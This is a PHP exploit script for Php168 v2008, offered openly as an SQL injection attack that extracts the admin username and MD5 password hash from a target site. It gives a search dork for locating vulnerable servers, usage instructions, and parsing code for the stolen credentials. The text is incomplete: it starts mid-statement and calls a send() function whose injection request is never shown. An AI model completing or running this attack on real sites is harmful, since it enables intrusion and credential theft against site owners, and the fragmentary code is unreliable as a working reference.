+---------------------------------------------------------------------------+
Php168 v2008 SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168 V2008"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to php168
Example:
php '.$argv[0].' localhost /php168/
+---------------------------------------------------------------------------+
');
exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$resp = send();
preg_match('/([a-z0-9]+)_article/', $resp, $pre);

if ($pre)
$resp = send();
else
exit("Exploit Failed!\n");

preg_match('/content_([\S]+)\|([a-z0-9]{32})/', $resp, $pwd);

if ($pwd)
exit("Expoilt Success!\nadmin:\t$pwd[1]\nPassword(md5):\t$pwd[2]\n");
else
exit("Exploit Failed!\n");